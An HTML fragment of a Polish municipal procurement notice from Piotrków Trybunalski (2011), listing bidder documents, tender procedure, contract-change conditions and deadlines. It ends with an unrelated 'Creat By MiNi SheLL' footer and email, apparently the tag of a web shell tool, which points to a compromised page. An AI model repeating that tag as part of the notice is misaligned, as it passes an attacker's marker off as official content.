<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
</li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz ofertowy według wzoru zawartego w specyfikacji istotnych warunków zamówienia - wg załącznika nr 1;
2.	Stosowne pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej (należy załączyć oryginał lub kseropię potwierdzoną przez notariusza);
3.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu                o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy             w sprawie niniejszego zamówienia publicznego (należy załączyć oryginał lub kserokopię potwierdzoną przez notariusza);
4.	Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, sporządzone na podstawie wzoru stanowiącego - wg załącznika nr 5;
5.	Oświadczenie o niepodleganiu wykluczeniu z postępowania na podstawie art. 24 ust 1 oraz ust 2 ustawy Pzp -  wg załącznika nr 2;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Postanowienia niniejszej umowy będą mogły zostać zmienione w stosunku do jej treści, jeżeli wystąpią następujące okoliczności :
1.	Wystąpi zmiana przepisów prawnych istotnych dla realizacji przedmiotu umowy i mająca wpływ na  zakres lub termin wykonania przedmiotu zamówienia.
2.	Wystąpi przedłużenie, w stosunku do terminów określonych przepisami prawa, czasu trwania procedur administracyjnych, mających wpływ na termin wykonania przedmiotu zamówienia a nie wynikających z przyczyn leżących po stronie Wykonawcy.
3.	Wystąpią wyjątkowo niesprzyjające warunki atmosferyczne uniemożliwiające w okresie ich występowania, realizację przedmiotu zamówienia i mające wpływ na termin wykonania.
4.	Zostały ujawnione wady opracowania projektowego lub rozbieżności pomiędzy projektem budowlanym i projektem wykonawczym  , o których zamawiający nie posiadał wiedzy, a które mają wpływ na termin lub koszt realizacji przedmiotu zamówienia.
5.	Inne wyżej niewymienione, za wystąpienie których nie będzie ponosić winy żadna ze stron umowy.

Zmiany te będą dopuszczalne wyłącznie w takim zakresie, w jakim ukończenie zamówienia jest, lub przewiduje się, że będzie, opóźnione na skutek tych działań, a w odniesieniu do ppkt. 1, 4, i 5. również z uwzględnieniem skutków finansowych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.piotrkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miasto Piotrków Trybunalski
Pasaż Karola Rudowskiego 10 
97-300 Piotrków Trybunalski 
p.317.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.03.2011 godzina 09:00, miejsce: Miasto Piotrków Trybunalski
Pasaż Karola Rudowskiego 10 
97-300 Piotrków Trybunalski 
p.317.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com